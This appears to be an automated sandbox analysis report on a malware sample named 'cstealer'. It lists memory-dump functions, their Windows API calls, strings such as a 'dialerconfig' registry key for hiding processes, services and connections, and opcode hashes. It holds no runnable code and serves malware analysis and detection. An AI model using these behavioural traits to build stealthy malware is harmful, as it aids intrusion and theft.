                                                                                                                                                            • Instruction ID: d9a4c15796ec447c937ae3d54500e02b2c84ef722bf71ed512ef800088086db0
                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction Fuzzy Hash: 5A116324F0538C82FAE4A7A556FD37912F1DB457B0F144715983667BEEDF2C96218220
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction ID: e3c789ba366dbf31b76001c7450954e2aecf7506cbb2e062e66062be159ea7c2
                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction Fuzzy Hash: 38015B22B00A8882EB94DB92E4A836A63F1F788FC0F584036DE4953759DF3CCA49C714
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction ID: c6c2fdbada0da571ab1d37107481d8fa1907281a2438699de315231a52d2fa52
                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction Fuzzy Hash: 92015E66A11B4882EBA49BA1F8AC32A32F0FB49B81F040429CD491775DEF3DC319C724
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction ID: 127e448ece45a1ef7e07f097991da7e74bed997000566eda1d7f1fcec42d2c52
                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                            • Instruction Fuzzy Hash: 3E51A33AB017088ADB98DF55F49CB6937F6F344B88F148124DA066374CEB79DA91C724
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction ID: f64fb2cd96a6736690c68ef385871fef910887cf7787888a3a53ef8a04d06bf5
                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                            • Instruction Fuzzy Hash: 91317A3AA0174896E7949F51F8AC76A37B5F344B88F158014AE4623789DB3DCAA0C724
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                            • String ID: \\?\
                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction ID: c5eabfbc4dce51eb00d7db9e91c22dd16de2934a0e178ee3b2b34b22c42588ab
                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction Fuzzy Hash: 55F04422B0468992E7A08BA1F8E876A67B0F748B88F944021DA494699DDF7CC74DCB14
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction ID: 38b259e5030e6d4ff33fab355b7e742526195e32011f54be37c98982b0c64879
                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction Fuzzy Hash: 7BF05E21A04B8C82EA808F92B9A812A62F1EB48FD0F184131EE4A07B2CDE3CC6558714
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction ID: 6e70634f0af33b44e24a1b6db91c742b06c283c3084ee28f637e188cfc3fcb70
                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction Fuzzy Hash: B1F09662B1170C81FB548BA5E8EC37A63B0FB88B61F54021ADA6A461ECCF3CC744C364
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction ID: a8ec3cc8889f481c582dbed460a60c7b26afd1e3978816ac6ed9055ca000c6e3
                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                            • Instruction Fuzzy Hash: 7F117026B11F0489EB40CFA0E8A93B933B4F319758F440E25DE6D427A8DF7CD2988390
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction ID: 3e286a0b5dae6c79ed74259a2fdba8c85a8c68cb1d42be27b8428fc83eba41c2
                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction Fuzzy Hash: 9871F536A0078946E7A49FA598E83BA67F4F385784F440016ED0963B8DDE3DC752C310
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: 3dd9ac58fcf21387159b6612d60bfa27d8578d662325695ff074e90b139d9303
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: 84617672A01B888AEB20CFA5F49439D7BF0F348B88F144A15EF5957B98DB38D695C710
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction ID: 6d5dbbd7f9dc57b8c28980917da9a6ee5181fd22c9a462032f99f6b69c8e475c
                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                            • Instruction Fuzzy Hash: 8F51F832A0478981E6B8DBA9A0FC3BA67F1F385740F450115ED4923B5DDA3DC728C7A4
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                            • String ID: U
                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction ID: 42a746e993e077e5b6da31abbce1ba80853f0c847efde859882bdd51a227e5d1
                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction Fuzzy Hash: DD41A332B19B8482DB608F65E4983BA77F0F798794F804121EE4D87798DB7DC641C764
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction ID: 19792b63f473d4a2caea047ac2086b1876ccdc7c08c987883663286b06311976
                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction Fuzzy Hash: 12113D36614B8882EBA18F15F49436A77F5F788B94F584221EE8C17758DF3CC665CB04
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                            • Instruction ID: a23753ef11280d960b695bf8cfeea628244a1482aade4a76fef887c74756e10c
                                                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                            • Instruction Fuzzy Hash: A2E08661A44B4894DF168FA1F8942A837F0DB58B64F4991229D5C46315FA3CD3E9C310
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                            • Instruction ID: d32f0ce8e4a31b12cf73d96a610ca70371bafe1b5cf65d3905ba16d0c6429b4d
                                                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                            • Instruction Fuzzy Hash: DCE08661A04B4894DF158FA1F8901A877F0EB58B54F889122DD5C46355EA3CD3E5C310
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 756756679-0
                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction ID: a13fb94993c7ffa5905b483ca064c149a53470f53a14879d1a7454de288e0cb0
                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction Fuzzy Hash: 5A118F25A01B8881EA84DBA6E49923A73F1FB89FC0F184029DE4D5376ADF3CD552C310
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction ID: d08d7b697d176bc37abd2505de4a3f4d18ea75b2d743479c17cfaff7b5d72da2
                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction Fuzzy Hash: 9BE06D36A0160886EB448FA2D86C36F36F1FB89F06F04C024C90907355DF7D9599CB60

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:2%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:96.9%
                                                                                                                                                            Signature Coverage:6.2%
                                                                                                                                                            Total number of Nodes:194
                                                                                                                                                            Total number of Limit Nodes:20
Execution graph (rendered as an interactive node/edge graph in the original report; the serialized node and edge data is omitted here). Windows API calls referenced by the graph nodes: StrCmpNIW, StrCmpIW, StrCmpW, StrCpyW, StrCatW, lstrlenW, PathCombineW, GetFileType, GetFinalPathNameByHandleW, VirtualQuery, VirtualAlloc, VirtualProtect, VirtualFree, FlushInstructionCache, GetLastError, GetProcessHeap, Sleep, SleepEx, RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey, GetModuleHandleA, LoadLibraryA, GetCurrentProcess, SetThreadContext, ResumeThread, IsProcessorFeaturePresent, RtlCaptureContext. CRT internals referenced: _invalid_parameter_noinfo, __free_lconv_mon, __vcrt_InitializeCriticalSectionEx, capture_previous_context.

Control-flow Graph

(Rendered graph for the function starting at 14e71282b2c; executed and not-executed basic blocks are colour-coded in the original report. The serialized basic-block and edge data is omitted here. API calls in the graph: GetModuleHandleA, StrCmpNIW, lstrlenW.)
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
• Instruction ID: 0449baa6b7c5b91a90aa4db36c4b5590e382bc6fa4fc5342ba7de86cddbcf73c
• Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
• Instruction Fuzzy Hash: 93B16C76210BD086EB698FA5D4407E9F7E6F744BA6F445016EF0963BA8EB34DC40E780

Control-flow Graph

(Rendered graph for the function starting at 14e7128253c; executed and not-executed basic blocks are colour-coded in the original report. The serialized basic-block and edge data is omitted here. API calls in the graph: GetFileType, StrCpyW.)
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction ID: 340681078b854a99e46290904f109e2b17001886fd21191800217abe7b861852
• Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction Fuzzy Hash: 8A71B3362007C186E729EEA6D8443EAF7D6F385BA6F440016DF0A53BA9DF35C545E780

Control-flow Graph

(Rendered graph for the function starting at 14e7128202c; executed and not-executed basic blocks are colour-coded in the original report. The serialized basic-block and edge data is omitted here. API calls in the graph: StrCmpNIW.)
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: S$dialer
• API String ID: 756756679-3873981283
• Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
• Instruction ID: efe1027abb51890203652d4591228d1a2deddd50a22973b240ee2c69c665909d
• Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
• Instruction Fuzzy Hash: 5451BD36B107A486EB61CFA5E8406EDF3E6F7147A5F149411DF0523BAADB35C852E380

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442
• Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction ID: 3f5fbf52c7b1b0c3645f4045b5783b21f51cd5e35a97f36df7070e0be23e8575
• Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction Fuzzy Hash: 7F711636310B908AEB109F69E891699B3F6FB84BAAF001511DF4E57B79DF38C454E384

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction ID: ba9ecb4d10810e6d2ec62df8c6f28dd82aeccdde71ac1d49f33606699660e33d
• Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction Fuzzy Hash: AD115E3671878182FF149B55E4046A9B2F2F748BA6F480429DF8917764EF3DC505D744

Control-flow Graph

(Rendered graph for the function starting at 14e71285b30; executed and not-executed basic blocks are colour-coded in the original report. The serialized basic-block and edge data is omitted here. API calls in the graph: GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache, ResumeThread.)
APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
• Instruction ID: 857b95f8a502f8cec1e6dbf059a91039e77373f79ecf0731b41d074e47a49f4f
• Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
• Instruction Fuzzy Hash: A5D17776204B8886DB70DB4AE49439AB7F1F388BA5F104116EB8D47BB9DF38C551DB40

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction ID: 56e86a83804d42a9eddd3e8b8d9409164324a6c01319e8123039a3ca364d85c2
• Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
• Instruction Fuzzy Hash: 85F08C723007C092EB208B65E884399F3E2F748BAAF844020CB4956AA4DA2CC68DDB44

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
• Instruction ID: a766f5e90c36a97ebfeae0bd8a2a79f6c6d77f248dacb9c8a974e23ea2b547bd
• Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
• Instruction Fuzzy Hash: 46029436219BC486EB60CB99E49039AB7F1F3847A5F104015EB8E87BA9DF7CC494DB40

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: Virtual$AllocQuery
• String ID:
• API String ID: 31662377-0
• Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
• Instruction ID: 559246f08743b7c784e7374959e58f646513aa59f3b0a1e0d09b073a98b2edf0
• Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
• Instruction Fuzzy Hash: B2312D3261DBC481EB30DA95E05139AF6E6F3887A5F100525A7CE47BB8DF7DC1809B84

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction ID: 270d3e70c633acf166a2e6a683a10a29327a942cddcf3bb7806f64e7349572f6
• Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction Fuzzy Hash: B8116D30A187C086FB60ABA1F8453D9F2E7BB58377F504524AB06827B1EF78C048A2C4

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: CacheCurrentFlushInstructionProcessProtectVirtual
• String ID:
• API String ID: 3733156554-0
• Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
• Instruction ID: 56d9d1b1254f5d4036e42dbc76622af3a7c13dc4e9148c0a185cc9f88d9fa650
• Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
